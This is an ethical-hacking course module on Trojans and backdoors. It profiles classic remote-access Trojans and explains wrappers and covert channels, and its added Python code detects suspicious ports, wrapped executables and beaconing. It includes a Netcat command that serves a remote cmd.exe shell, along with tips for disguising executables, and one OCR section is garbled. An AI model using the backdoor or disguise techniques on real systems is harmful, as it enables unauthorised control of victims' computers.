[Screenshot: ZeroTracks - Surf History Eraser. Windows items: Miscellaneous, Paging File, Recent Docs, Recycle Bin, Temp Files, UserAssist, Start Menu Run List; an Internet Explorer section; option "Use Splash Screen". The help text notes that items typed into the Start Menu Run box are recorded and might include website addresses.]
Summary

• Hackers use a variety of means to penetrate systems.
• Password guessing/cracking is one of the first steps.
• Password sniffing is a preferred eavesdropping tactic.
• Vulnerability scanning helps the hacker identify which password cracking technique to use.
• Keystroke logging and other spyware tools are used once they gain entry to systems, to keep up the attacks.
• Invariably, evidence of "having been there and done the damage" is eliminated by attackers.
• Stealing files as well as hiding files are means used to sneak out sensitive information.
Ethical Hacking

Module VI
Trojans and Backdoors

Scenario

It's Valentine's Day but Jack is totally shattered. The reason? Jill just rejected his proposal. Jack reacted calmly to the situation, saying he would not mind, provided they could still be friends, to which Jill agreed.

But something is going on in the back of his mind... he wants to teach Jill a lesson. Jack and Jill are studying in the computer department at the university campus. All the students have individual PCs in their dorms.
Scenario (cont.)

One day Jack emails an attachment that looks like a Word document to Jill. Unsuspectingly, Jill clicks the attachment but finds nothing in it.

Bingo!! Jill's system is infected by a remote access Trojan, but she is unaware of it.

Jack has total control over Jill's system.

Guess what Jack can do to Jill?
• Steal her passwords.
• Use her system to attack other systems on the university campus.
• Delete all her confidential files.
• And a lot more.
Module Objective

• Effect on business
• Trojan definition and how it works
• Types of Trojans
• What Trojan creators look for
• Different ways a Trojan can get into a system
• Indications of a Trojan attack
• Some famous Trojans and ports used by them
• How to determine what ports are "listening"
• Different Trojans found in the wild
• Wrappers
• Tools used for hacking
• ICMP tunneling
• Anti-Trojans
• How to avoid a Trojan infection
• Summary
Module Flow

Introduction to Trojans -> Overt & Covert Channels -> Types and How Trojans Work -> Different Trojans -> Indications of Trojan Attack -> ICMP Tunneling -> Anti-Trojan -> Countermeasures
Introduction

• Malicious users are always on the prowl to sneak into the network and create trouble.
• Several businesses around the globe have been affected by Trojan attacks.
• Most of the time it is the absent-minded user who invites trouble by downloading files or not being bothered with the security aspects.
• This module covers different Trojans, the way they attack, and the tools used to send them across the network.
Effect on Business

• "They (hackers) don't care what kind of business you are, they just want to use your computer," says Assistant U.S. Attorney Floyd Short in Seattle, head of the Western Washington Cyber Task Force, a coalition of federal, state, and local criminal justice agencies.
• If the data is altered or stolen, a company may risk losing credibility and the trust of its customers.
• There is a continued increase in malware that installs open proxies on systems, especially targeting broadband users' machines to turn them into zombies.
• Businesses most at risk, experts say, are those handling online financial transactions.
What is a Trojan?

• A Trojan is a program that presents itself as something useful or harmless while running hidden code on the infected computer.
• With the help of a Trojan, an attacker gets access to stored passwords on the Trojaned computer and would be able to read personal documents, delete files, display pictures, and/or show messages on the screen.
Overt and Covert Channels

Overt Channel
• A legitimate communication path within a computer system or network for the transfer of data.
• An overt channel can be exploited to create a covert channel by choosing components of the overt channel with care, namely ones that are idle or not related to the data being carried.

Covert Channel
• A channel that transfers information within a computer system or network in a way that violates security policy.
• The simplest form of covert channel in practice is a Trojan's command channel, which hides its traffic inside a protocol the network already allows.
• The attacker gets access to the Trojaned system as soon as the system goes online.
• By way of the access provided by the Trojan, the attacker can stage attacks of different types.
Different Types of Trojans

• Remote Access Trojans
• Data-Sending Trojans
• Destructive Trojans
• Denial-of-Service (DoS) Attack Trojans
• Proxy Trojans
• FTP Trojans
• Security Software Disablers
What Do Trojan Creators Look For?

• Credit card information, email addresses
• Account data (passwords, user names, etc.)
• Confidential documents
• Financial data (bank account numbers, social security numbers, insurance information, etc.)
• Calendar information concerning the victim's whereabouts
• Using the victim's computer for illegal purposes, such as to hack, scan, flood, or infiltrate other machines on the network or Internet
Different Ways a Trojan Can Get into a System

• ICQ
• IRC
• Attachments
• Physical access
• Browser and email software bugs
• NetBIOS (file sharing)
• Fake programs
• Untrusted sites and freeware software
• Downloading files, games, and screensavers from an Internet site
• Legitimate "shrink-wrapped" software packaged by a disgruntled employee

[Screenshots: two Yahoo! Mail attachment prompts ("Scan and Download Attachment" / "Scan and Save to my Yahoo! Briefcase") for files named Physical_Security_refers_to_those_practices.doc and Security_Checklist_for_Wireless_Network.doc, each described as a ".doc file".]

A displayed name ending in .doc is not proof of the file type: Windows hides known extensions by default, so a file named report.doc.exe is shown as report.doc.
Indications of a Trojan Attack

• CD-ROM drawer opens and closes by itself
• Computer screen flips upside down or inverts
• Wallpaper or background settings change by themselves
• Documents or messages print from the printer by themselves
• Computer browser goes to a strange or unknown web page by itself
• Windows color settings change by themselves
• Screensaver settings change by themselves
• Right and left mouse buttons reverse their functions
• Mouse pointer disappears
• Mouse moves by itself
• Windows Start button disappears
• Strange chat boxes appear on the victim's computer and the victim is forced to chat with some stranger
• The ISP complains to the victim that his/her computer is IP scanning
• People chatting with the victim know too much personal information about him or his computer
• Computer shuts down and powers off by itself
• Taskbar disappears
• The account passwords are changed or unauthorized persons can access legitimate accounts
• Strange purchase statements in credit card bills
• The computer monitor turns itself off and on
• Modem dials and connects to the Internet by itself
• Ctrl+Alt+Del stops working
• While rebooting the computer, a message flashes that there are other users still connected

These are the symptoms of the noisy "fun stuff" features of the Trojans in this module. A Trojan written to stay hidden produces none of them, so the absence of symptoms proves nothing; the port and process checks that follow are the reliable tests.
Some Famous Trojans and Ports Used by Them

  Trojan             Protocol   Ports
  Back Orifice       UDP        31337 or 31338
  Deep Throat        UDP        2140 and 3150
  NetBus             TCP        12345 and 12346
  Whack-a-mole       TCP        12361 and 12362
  NetBus 2 Pro       TCP        20034
  GirlFriend         TCP        21544
  Masters Paradise   TCP        3129, 40421, 40422, 40423 and 40426

These are default ports. Most of these Trojans let the attacker configure a different port when building the server, so a clean scan of the ports listed here proves nothing on its own.
How to Determine Which Ports Are "Listening"

• Go to Start -> Run -> cmd
• Type netstat -an and press Enter
• Exit the command shell

On Windows XP and later, netstat -ano also prints the owning process ID, so each listening port can be tied to the program behind it.

  C:\>netstat -an

  Active Connections

    Proto  Local Address          Foreign Address        State
    TCP    0.0.0.0:7              0.0.0.0:0              LISTENING
    TCP    0.0.0.0:9              0.0.0.0:0              LISTENING
    TCP    0.0.0.0:13             0.0.0.0:0              LISTENING
    TCP    0.0.0.0:17             0.0.0.0:0              LISTENING
    TCP    0.0.0.0:19             0.0.0.0:0              LISTENING
    TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
    TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
    TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1030           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1224           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1681           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1683           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1685           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1686           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:1801           0.0.0.0:0              LISTENING
    TCP    0.0.0.0:2103           0.0.0.0:0              LISTENING
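Comparing the netstat output by eye against the port table is the procedure the slides describe; the following is an added example, not from the course, that does the same check in code. It parses the Windows netstat -an layout, keeps only the sockets that are actually accepting traffic (TCP in LISTENING, plus every UDP socket, since UDP shows no state) and looks each one up in the default-port table from this page (with Tini's fixed port 7777 added). The netstat text is constructed to match the slide's layout, with a NetBus listener and a Back Orifice UDP socket added so the check has something to find.

```python
# Checking `netstat -an` output against the slide's default-port table.
# Added example, not from the course. The netstat text is constructed.
import re

# (protocol, port) -> Trojan, from the table on this page plus Tini (7777).
KNOWN_TROJAN_PORTS = {
    ("UDP", 31337): "Back Orifice", ("UDP", 31338): "Back Orifice",
    ("UDP", 2140): "Deep Throat", ("UDP", 3150): "Deep Throat",
    ("TCP", 12345): "NetBus", ("TCP", 12346): "NetBus",
    ("TCP", 12361): "Whack-a-mole", ("TCP", 12362): "Whack-a-mole",
    ("TCP", 20034): "NetBus 2 Pro",
    ("TCP", 21544): "GirlFriend",
    ("TCP", 3129): "Masters Paradise", ("TCP", 40421): "Masters Paradise",
    ("TCP", 40422): "Masters Paradise", ("TCP", 40423): "Masters Paradise",
    ("TCP", 40426): "Masters Paradise",
    ("TCP", 7777): "Tini",
}

SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.5:1030       10.0.0.7:80            ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:31337          *:*
"""

# proto, local address, local port, foreign address[:port], optional state
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def parse_netstat(text: str) -> list:
    """One dict per socket line; header and blank lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, laddr, lport, faddr, state = m.groups()
            sockets.append({"proto": proto, "local": laddr, "port": int(lport),
                            "foreign": faddr, "state": state or ""})
    return sockets


def listening_sockets(sockets: list) -> list:
    """TCP sockets waiting for connections, plus every UDP socket."""
    return [s for s in sockets
            if s["proto"] == "UDP" or (s["proto"] == "TCP" and s["state"] == "LISTENING")]


def match_trojan_ports(sockets: list) -> list:
    """(proto, port, Trojan name) for each listening socket on a known default port."""
    return [(s["proto"], s["port"], KNOWN_TROJAN_PORTS[(s["proto"], s["port"])])
            for s in listening_sockets(sockets)
            if (s["proto"], s["port"]) in KNOWN_TROJAN_PORTS]


if __name__ == "__main__":
    for hit in match_trojan_ports(parse_netstat(SAMPLE_NETSTAT)):
        print("possible %s on %s/%d" % (hit[2], hit[0], hit[1]))
```

A hit is a lead, not a verdict: confirm which process owns the socket (netstat -ano on XP and later, or a tool such as fport or TCPView) before concluding anything, and remember that the table only covers default ports.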
Classic Trojans Found in the Wild

• Beast
• Phatbot
• Amitis
• QAZ
• Back Orifice
• Back Orifice 2000
• Tini
• NetBus
• SubS even
• Netcat
• Donald Dick
• Let me rule
• RECUB

Classic Trojans presented here as proof of concept.
Trojan: Tini

• It is a very tiny Trojan program which is only 3 KB and programmed in assembly language. It takes minimal bandwidth to get onto the victim's computer and takes little disk space.
• Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. The port number is fixed and cannot be customized. This makes it easy to detect a victim system by scanning for port 7777.
• From a Tini client, the attacker can telnet to the Tini server at port 7777.

Source: http://ntsecurity.nu/toolbox/tini
Trojan: NetBus

• NetBus is a Win32-based Trojan program.
• Like Back Orifice, NetBus allows a remote user to access and control the victim's machine by way of its Internet link.
• NetBus was written by a Swedish programmer, Carl-Fredrik Neikter, in March 1998.
• This Trojan is also known as Backdoor.Netbus.

[Screenshot: the NetBus 1.60 client ("by cf"). Functions: Server admin, Open CD-ROM, Show image, Swap mouse, Start program, Msg manager, Screendump, Get info, Play sound, Exit Windows, Send text, Active wnds, Mouse pos, Listen, Goto URL, Key manager, Sound system, File manager, Control mouse. Fields: Host name/IP (localhost), Interval (60), Program/URL (http://www.casino.com), Text to send, Cmd delay; status "No connection".]

Source: http://www.jcw.cc/netbus-download.html
Trojan: Netcat

Netcat is a general-purpose network tool; it appears in this list because its -e option turns it into a backdoor. Used as a client, it simply talks to a port, as in this banner grab:

  C:\Program Files\Tools\Netcat>nc 210.212.219.76 80
  GET / HTTP/1.0

  HTTP/1.1 200 OK
  Date: Mon, 16 Jun 2003 06:21:22 GMT
  Server: Apache/1.3.19 (Unix) (Red-Hat/Linux)
  Last-Modified: Sun, 15 Jun 2003 11:34:01 GMT
  ETag: "467d8-3619-3eec59a9"
  Accept-Ranges: bytes
  Content-Length: 13849
  Connection: close
  Content-Type: text/html

  <html>

• Outbound or inbound connections, TCP or UDP, to or from any ports
• Ability to use any local source port
• Ability to use any locally configured network source address
• Built-in port-scanning capabilities, with randomizer
• Built-in loose source-routing capability
Netcat Client/Server

• The client connects to the Netcat server; the server pushes a "shell" to the client.

  Netcat client:   nc <ip> <port>
  Netcat server:   nc -L -p <port> -t -e cmd.exe

In the server command, -L is the Windows build's "listen harder" option (it listens again after the client disconnects), -e hands the accepted connection to cmd.exe, and -t answers telnet negotiation so a plain telnet client can also be used. A listener of this shape, or any nc process with -e, on a workstation is the thing to look for.
Trojan: Beast 2.06

• Beast is a powerful Remote Administration Tool (a.k.a. Trojan) built with Delphi 7.
• One of the distinct features of Beast is that it is an all-in-one Trojan (client, server, and server editor are stored in the same application).
• An important feature of the server is that it uses injection: the server code is loaded into another running process, so no separate Trojan process shows up in the task list.
• The new version has system time management.

[Screenshot: Beast 2.06 client. Fields Host (127.0.0.1), Password, Port; button "Go BEAST!"; status Disconnected. Build Server, Plugins, Binder. Managers: Files, Registry, Screen, WebCam, Apps, Processes, Services, Clipboard, Passwords. Other groups: Windows, Lamer Stuff, Fun Stuff, Server, Misc, Beast Stuff.]
Wrappers

• How does an attacker get any Trojan installed on the victim's computer? Answer: using wrappers.
• A wrapper attaches a given EXE application (such as a game or office application) to the Trojan executable.
• The two programs are wrapped together into a single file. When the user runs the wrapped EXE, it first installs the Trojan in the background and then runs the wrapped application in the foreground.
• The user only sees the latter application.

[Diagram: Chess.exe (90 KB) + Trojan.exe (20 KB) -> wrapped Chess.exe (110 KB); a command prompt shows C:\>trojan.exe being run.]

Attackers might send a birthday greeting which will install the Trojan as the user watches a birthday cake dancing across the screen.
Graffiti.exe Program

• Graffiti.exe is an example of a legitimate file that can be used to drop the Trojan into the target system.
• This program runs as soon as Windows boots up and, on execution, keeps the user distracted for a given period of time by running on the desktop.
Wrapping Tools

• One file exe maker
  • Helps to combine two or more files into a single file
  • Compiles the selected list of files into one host file
  • The host file is a simple compiled program
  • It decompresses and executes the source programs
• Yet another binder
  • Created in March 2002
  • Supports the Windows platform
  • Also known as YAB
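The wrapper slides describe the attacker's side: a host program and a Trojan glued into one executable. The following is an added example, not from the course or from any of the binders it names, of the corresponding check on the defender's side. A binder that appends the payload to the host leaves it after the last PE section, in the bytes the section table does not account for (the "overlay"); the code walks the real PE headers to find where the sections end and reports what lies beyond. build_fake_pe() constructs a minimal PE32 image purely so the check can run offline; it is not a real program, and the 300-byte and 100-byte "sections" stand in for Chess.exe and Trojan.exe from the diagram.

```python
# Checking a suspect executable for a wrapped payload. Added example, not
# from the course: the bytes past the end of the last section's raw data are
# the "overlay", which is where a simple binder appends the Trojan.
import struct

FILE_ALIGN = 0x200          # typical FileAlignment
PE32_MAGIC = 0x10B
OPT_HEADER_SIZE = 0xE0      # standard PE32 optional header size


def _align(n: int, a: int) -> int:
    return (n + a - 1) // a * a


def build_fake_pe(section_data: bytes) -> bytes:
    """One-section PE32 image for demonstration: MZ stub, PE signature,
    COFF header, zeroed optional header, one section header, raw data."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)             # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, OPT_HEADER_SIZE, 0x0102)  # i386, 1 section
    optional = struct.pack("<H", PE32_MAGIC) + bytes(OPT_HEADER_SIZE - 2)
    raw_size = _align(len(section_data), FILE_ALIGN)
    raw_ptr = FILE_ALIGN
    section = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                          raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + optional + section
    headers += bytes(raw_ptr - len(headers))
    return headers + section_data + bytes(raw_size - len(section_data))


def overlay(pe: bytes) -> bytes:
    """Bytes after the last section's raw data. Walks the headers as the PE
    format lays them out: e_lfanew -> COFF header (NumberOfSections at +2,
    SizeOfOptionalHeader at +16) -> 40-byte section headers (SizeOfRawData
    at +16, PointerToRawData at +20)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    end = 0
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", pe, table + i * 40 + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return pe[end:]


def inspect(pe: bytes) -> dict:
    ov = overlay(pe)
    return {"overlay_bytes": len(ov), "overlay_is_pe": ov[:2] == b"MZ"}


if __name__ == "__main__":
    host = build_fake_pe(b"\x90" * 300)      # stands in for Chess.exe
    trojan = build_fake_pe(b"\xCC" * 100)    # stands in for Trojan.exe
    print(inspect(host))                     # no overlay
    print(inspect(host + trojan))            # 1024-byte overlay that is itself a PE
```

Two caveats before alerting on an overlay: Authenticode-signed binaries legitimately carry one (the certificate table lives there) and self-extracting installers store their archive there, so check the security data directory and known installer stubs first; and a binder that rebuilds the host (adding a section or a resource instead of appending) will not show up this way, which is why section count, section entropy and import table are checked alongside.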
Packaging Tool: WordPad

• Open WordPad. Using the mouse, drag-and-drop Notepad.exe into the WordPad window. On double-clicking the embedded icon, Notepad will open. Now, right-click on the Notepad icon within WordPad and copy it to the desktop.
• The icon that appears is very similar to the default text icon. The icon can be changed by using the Properties box.
• What lands on the desktop is a Windows "scrap" object (.shs). Double-clicking it runs the embedded program, and Explorer never shows the .shs extension, even when other extensions are visible, which is what makes the trick convincing.

[Screenshots: two WordPad windows (File, Edit, View, Insert, Format, Help; Arial 10, Western) with an embedded object icon in the document.]
RemoteByMail

• Control and access your computer through email.
• Can retrieve files or folders by sending commands through email.
• Marketed as an easier and more secure way of accessing files or executing programs; in the context of this module it is a command channel that rides on ordinary mail traffic.

[Screenshot: RemoteByMail (File, Actions, Tools, Help). Start server / Stop; "Listening to accounts: test (you@sample.com)"; Check now. Statistics: Running since (Stopped), Emails received 0, Cmds executed 0, Emails sent 0, Next email check n/a, Now checking, Last response, State, Last error, Progress. Panes: Emails received, Command queue, Outgoing emails. "Unlicensed Evaluation Copy"; status Stopped.]



I 



© Icon Plus is a 
conversion program 
for translating icons 
between various 
formats 

© This kind of 
application can be 
used by an attacker to 
disguise his malicious 
code or Troj an so that 
users are tri eked i nto 
executing it 



Icon Plus! - Coded by The EkCoo 



Original File 






1 






*l*l 


Current Icon: |o 


Total Icons: |o 



ricon Files- 



I 

P Replace 32x32 icons |7 Replace 1 6x1 G icons 



r Resulting File- 



rLast Operation (Compression / Compilation)- 



3 
Defacing Application: Restorator

• It is a versatile skin editor for any Win32 program: change images, icons, text, sounds, videos, dialogs, menus, and other parts of the user interface.
• Using this, one can create one's own User-styled Custom Applications (UCA).
• Restorator has many built-in tools.
• Powerful find and grab functions let the user retrieve resources from all files on their disks.

[Screenshot: Restorator 2.50 opened on C:\Restorator\Testfiles\ImageTest.res. Menus File, Resources, Viewer, Browser, Bookmarks, Tools, Options, Help, Debug. Resource tree (Icon, Bitmap); a file browser listing executables such as AcroRd32.exe, aim.exe, IEXPLORE.EXE and HYPERTRM.EXE with size, type and modified date; selected resource Bitmap\SPLASH\Neutral; "61 open files".]
Lazaris

• A Tetris program can be used as a Trojan wrapper
• Addictive game
• Easy to send by mail

[Screenshot: the Lazaris game window with Start, Pause, Reset, Help, Level, Score and Close.]
HTTP Trojans

• The attacker must install a simple Trojan program on a machine in the internal network, the Reverse WWW shell server.
• Reverse WWW shell allows an attacker to access a machine on the internal network from the outside.
• On a regular basis, usually every 60 seconds, the internal server will try to access the external master system to pick up commands.
• If the attacker has typed something into the master system, this command is retrieved and executed on the internal system.
• Reverse WWW shell uses the standard HTTP protocol.
• It looks like an internal user is browsing the web. Because every connection is outbound, inbound filtering never sees it; the proxy log is where the regular polling shows up.

Trojan Attack Through HTTP

[Diagram: the internal victim machine polls the attacker's external server over HTTP.]
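The polling behaviour described above is also the detection hook. The following is an added example, not from the course or from the Reverse WWW shell program itself: it groups proxy log entries by (client, host), measures the gaps between successive requests and reports pairs whose gaps are nearly constant. A person browsing produces irregular gaps; a Trojan that checks in "every 60 seconds" produces gaps of 60 s with almost no spread. The log lines are constructed in a simple "time client method host path status" form, and the host names and addresses are invented.

```python
# Finding a Reverse WWW shell's heartbeat in proxy logs. Added example, not
# from the course. Log lines are constructed; the only real thing here is
# the measurement: coefficient of variation (stdev / mean) of request gaps.
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# 10.1.1.25 polls evil-master.example once a minute (one request is a second
# late, as a real client would be); 10.1.1.30 is a person reading the news.
SAMPLE_PROXY_LOG = """\
2005-02-14T09:00:00 10.1.1.25 GET evil-master.example /cgi-bin/orders 200
2005-02-14T09:00:03 10.1.1.30 GET news.example /index.html 200
2005-02-14T09:01:00 10.1.1.25 GET evil-master.example /cgi-bin/orders 200
2005-02-14T09:01:21 10.1.1.30 GET news.example /sports/ 200
2005-02-14T09:02:00 10.1.1.25 GET evil-master.example /cgi-bin/orders 200
2005-02-14T09:02:02 10.1.1.30 GET news.example /weather/ 200
2005-02-14T09:03:01 10.1.1.25 GET evil-master.example /cgi-bin/orders 200
2005-02-14T09:04:00 10.1.1.25 GET evil-master.example /cgi-bin/orders 200
2005-02-14T09:04:47 10.1.1.30 GET news.example /index.html 200
2005-02-14T09:05:00 10.1.1.25 GET evil-master.example /cgi-bin/orders 200
2005-02-14T09:09:12 10.1.1.30 GET news.example /archive/ 200
"""


def parse_log(text: str) -> list:
    """(timestamp, client, host) per line; blank lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, client, _method, host, _path, _status = line.split()
        records.append((datetime.fromisoformat(when), client, host))
    return records


def find_beacons(records: list, min_requests: int = 5, max_cv: float = 0.10) -> list:
    """One dict per (client, host) whose inter-request gaps have a
    coefficient of variation at or below max_cv. Pairs with fewer than
    min_requests requests are ignored: too few gaps to judge regularity."""
    by_pair = defaultdict(list)
    for when, client, host in records:
        by_pair[(client, host)].append(when)
    beacons = []
    for (client, host), times in sorted(by_pair.items()):
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            beacons.append({"client": client, "host": host, "requests": len(times),
                            "interval_s": round(avg, 1), "cv": round(cv, 3)})
    return beacons


if __name__ == "__main__":
    for beacon in find_beacons(parse_log(SAMPLE_PROXY_LOG)):
        print(beacon)
```

Legitimate software polls too (update checks, mail clients), so the output is a triage list to be filtered against known hosts, and a more careful implant adds random jitter to its interval, which raises the coefficient of variation; widen max_cv or look at the distribution of gaps rather than their spread when that is suspected.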
Tool: Hard Disk Killer (HDKP 4.0)

• The Hard Drive Killer Pro series of programs offers one the ability to fully and permanently destroy all data on any given DOS or Win3.x/9x/NT/2000 based system... in other words, 90% of the PCs worldwide at the time.
• The program, once executed, will start eating up the hard drive and/or infect and reboot the hard drive within a few seconds.
• After rebooting, all hard drives attached to the system would be formatted (in an unrecoverable manner) within only 1 to 2 seconds, regardless of the size of the hard drive, according to its author.

Classic tool presented here as proof of concept.
Covert Channels

© Covert Channels are methods in which an attacker can hide the data in a protocol that is undetectable

© Covert Channels rely on techniques called tunneling, which allow one protocol to be carried over another protocol

© ICMP tunneling is a method of using ICMP echo-request and echo-reply as a carrier of any payload an attacker may wish to use, in an attempt to stealthily access, or control, a compromised system
Trojan: Phatbot

© This Trojan allows the attacker to have control over computers and link them into P2P networks that can be used to send large amounts of spam email messages or to flood websites with data in an attempt to knock them offline

© It can steal Windows Product Keys, AOL logins and passwords, as well as CD keys of some famous games

© It tries to disable antivirus software and firewalls

Classic Trojan presented here as proof of concept
Trojan: Amitis

© It has more than 400 ready-to-use options

© It is the only Trojan that has a live update

© The server copies itself to the Windows directory, so even if the main file is deleted, the victim is still infected

© The server automatically sends the requested notification as soon as the victim gets online

Source: http://www.immortal-hackers.com

[Screenshot: Amitis client connecting to 192.168.1.23, with its option tree (Have Some Fun, Annoy, Files, Keylogger, Programming, Program Manager, Main Options, Melody Studio)]
Trojan: Senna Spy

© Senna Spy Generator 2.0 is a Trojan generator. Senna Spy Generator is able to create Visual Basic source code for a Trojan based on a few options

© This Trojan is compiled from generated source code, so anything could be changed in it

Source: http://sennaspy.cjb.net/

Server Features

Change wallpaper
Chat with server
Execute DOS commands
Find files
FTP server
Hang up Internet connection
Open/close CD-ROM
Play AVI or WAV
Reset Windows
Send keys

Classic Trojan presented here as proof of concept
Trojan: QAZ

© It is a companion virus that can spread over the network

© It also has a "backdoor" that will enable a remote user to connect to and control the computer using port 7597

© It may have originally been sent out by email

© It renames Notepad to note.com

© Modifies the registry key:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Network Hacked by QAZ Trojan

http://www.msnbc.com/msn/482011.asp Oct. 29, 2000

The intruder who broke into Microsoft's internal network may have done so through an employee's home machine connected to the network, Microsoft officials told the New York Times. In a report published Sunday, the software company's corporate security officer also told the Times that the break-in was first noticed when irregular new accounts began appearing more than a week ago. MICROSOFT ACKNOWLEDGED on Friday that its security had been breached and that outsiders using a "Trojan horse" virus had gotten a look at but did not corrupt a valuable software blueprint, or "source code," for a computer program under development.

Case study
Trojan: Back Orifice

[Screenshot: cDc Back Orifice Win32 GUI Client]

© Back Orifice (BO) is a remote administration system which allows a user to control a computer across a TCP/IP connection using a simple console or GUI application. On a local LAN or across the Internet, BO gives its user more control of the remote Windows machine than the person at the keyboard of the remote machine.

© Back Orifice was created by a group of well-known hackers who call themselves the CULT OF THE DEAD COW.

© BO is small, and entirely self-installing.

Source: http://www.cultdeadcow.com/

Classic Trojan presented here as proof of concept
Trojan: Back Orifice 2000

[Screenshot: BO2K Configuration Wizard, which walks through choosing a BO2K server and configuring it with a new password]

© BO2K has stealth capabilities: it will not show up on the task list and runs completely in hidden mode

Back Orifice accounts for the highest number of infestations on Microsoft computers.

The BO2K server code is only 100KB. The client program is 500KB.

Once installed on a victim PC or server machine, BO2K gives the attacker complete control of the system.

Classic Trojan presented here as proof of concept
Back Orifice Plug-ins

© BO2K functionality can be extended using BO plug-ins

© BO Peep (Complete remote control snap-in)

© Encryption (Encrypts the data sent between the BO2K GUI and the server)

© BOSOCK32 (Provides stealth capabilities by using ICMP instead of TCP/UDP)

© STCPIO (Provides encrypted flow control between the GUI and the server, making the traffic more difficult to detect on the network)
Trojan: SubSeven

© SubSeven is a Win32 Trojan

© The credited author of this Trojan is mobman

© It takes down the computer and causes a constant stream of error messages

© SubSeven is a Trojan virus most commonly spread through file attachments in email messages and the ICQ program

[Screenshot: SubSeven client with a connection manager (127.0.0.1, port 1999), IP scanner, file manager, keylogger, password retrieval, registry editor, webcam and desktop viewing functions]
Trojan: CyberSpy Telnet Trojan

© CyberSpy is a telnet Trojan, which means a client terminal is not necessary to get connected

© It is written in VB and a little bit of C programming

© It supports multiple clients

© It has about 47 commands

© It has ICQ, email, and IRC bot notification

© Other things like fake error/port/pw/etc. can be configured with the editor
Trojan: Subroot Telnet Trojan

© It is a telnet remote administration tool

© It was written and tested in the Republic of South Africa.

© It has variants

• SubRoot 1.0

• SubRoot 1.3

[Screenshot: subroot server v1.3 listening on port 7418 and prompting for a username; connection accepted from 127.0.0.1]
Trojan: Let Me Rule! 2.0 BETA 9

© Written in Delphi

© Released in January 2004

© A remote access Trojan

© It has a DOS prompt that allows control of the victim's command.com

© It deletes all files in a specific directory

© All types of files can be executed at the remote host

© The new version has an enhanced registry explorer

[Screenshot: Let Me Rule! v2.0 BETA 8.1 client connected to localhost, with Server, CD-ROM, Keyboard, Mouse, Sound, Screen and Msg-Box tabs and monitor, screensaver, desktop, taskbar and start button controls]
Trojan: Donald Dick

© The attacker uses the client to send commands through TCP or SPX to the victim listening on a pre-defined port

© Donald Dick uses default port either 23476 or 23477

© Donald Dick is a tool that enables a user to control another computer over a network. It uses a client server architecture with the server residing on the victim's computer

[Screenshot: Donald Dick 1.53 client with File System, Registry, Processes, Windows, Keyboard, Miscellaneous, Passwords, System and Server tabs, and a TCP/SPX connection selector]
Trojan: RECUB

© RECUB (Remote Encrypted Callback Unix Backdoor) is a Windows port of a remote administration tool which can also be used as a backdoor on a Windows system

© It bypasses the firewall by opening a new window of IE and then injecting code into it

© It uses Netcat for remote shell

© It empties all event logs after exiting the shell

Source: http://www.hirosh.net

Classic Trojan presented here as proof of concept
Hacking Tool: Loki

(www.phrack.com)

© Loki was written by daemon9 to provide shell access over ICMP, making it much more difficult to detect than TCP- or UDP-based backdoors.

© As far as the network is concerned, a series of ICMP packets are shot back and forth: a ping, pong response. As far as the attacker is concerned, commands can be typed into the loki client and executed on the server.

Classic tool presented here as proof of concept
Loki Countermeasures

© Configure the firewall to block ICMP or limit the allowable IPs' incoming and outgoing echo packets

© Blocking ICMP will disable ping requests and may cause inconvenience to users

© It is recommended to be careful while deciding on security versus convenience

© Loki also has the option to run over UDP port 53 (DNS queries and responses)
Tool: Atelier Web Remote Commander

© Access to the remote computer desktop

© Local files can be uploaded to the remote system

© Files can be remotely zipped or unzipped

© Allows sending or receiving the Clipboard contents like text, pictures, and Windows Clipboard formats

[Screenshot: Atelier Web Remote Commander connected to 192.168.1.105, showing the remote Device Manager (IDE controllers, keyboards, mice, monitors, processors, SCSI and RAID controllers)]
Trojan Horse Construction Kit

© Such kits help hackers to construct Trojan horses of their choice

© These tools can be dangerous and can backfire if not executed properly

© Some of the Trojan kits available in the wild are as follows:

• The Trojan Horse Construction Kit v2.0

• Progenic Mail Trojan Construction Kit - PMT

• Pandora's Box
